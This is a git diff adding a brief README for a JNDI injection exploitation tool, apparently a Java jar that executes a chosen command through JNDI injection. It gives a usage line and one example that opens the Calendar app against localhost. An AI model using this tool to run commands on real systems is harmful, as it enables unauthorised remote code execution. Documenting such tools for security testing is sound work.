diff --git a/README.md b/README.md new file mode 100644 index 0000000..cde4006 --- /dev/null +++ b/README.md @@ -0,0 +1,11 @@ +# JNDI-Injection-Exploit +JNDI命令注入利用 + +## Usage: +``` +java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] +``` +## Example: +``` +java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calendar.app" -A 127.0.0.1 +```